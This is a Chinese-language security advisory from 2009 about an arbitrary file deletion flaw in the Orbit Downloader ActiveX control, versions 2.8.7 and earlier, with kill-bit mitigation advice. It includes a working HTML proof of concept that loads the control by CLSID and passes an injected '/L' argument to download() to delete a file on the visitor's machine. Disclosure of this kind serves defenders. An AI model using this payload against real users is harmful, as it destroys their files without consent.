Orbit Downloader ActiveX控件download()方式任意文件删除漏洞
发布日期:2009-03-23
更新日期:2009-03-24
受影响系统:OrbitDownloader.com Orbit Downloader <= 2.8.7
描述:
BUGTRAQ ID:
34200
Orbit Downloader是用于从视频共享网站下载流媒体的下载管理器。
Orbit Downloader ActiveX控件(CLSID:{3F1D494B-0CEF-4468-96C9-386E2E4DEC90},ProgID:Orbitmxt.Orbit)没有正确地对download()方式所传送的输入参数做检查,如果用户受骗访问了恶意网页并向该方式传送了恶意参数的话,就可能导致删除任意系统文件。
<*来源:Janek Vind (
come2waraxe@yahoo.com)
链接:
http://milw0rm.com/exploits/8257
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<html><head>
<title>Orbit Downloader <= 2.8.7 Arbitrary File Deletion PoC by waraxe</title>
<script>
function test()
{
waraxe.download('','','" /Lc:\\test.txt "','',1);
}
</script>
</head><body>
<object
id="waraxe" name="waraxe"
classid="CLSID:3F1D494B-0CEF-4468-96C9-386E2E4DEC90"
width="50" height="50">
</object>
<br><center>
<button onclick="javascript:test();"> Test </button>
</body></html>
建议:
临时解决方法:
* 为CLSID:{3F1D494B-0CEF-4468-96C9-386E2E4DEC90}设置kill-bit。
厂商补丁:
OrbitDownloader.com
-------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.orbitdownloader.com/浏览次数:2610
严重程度:0(网友投票)
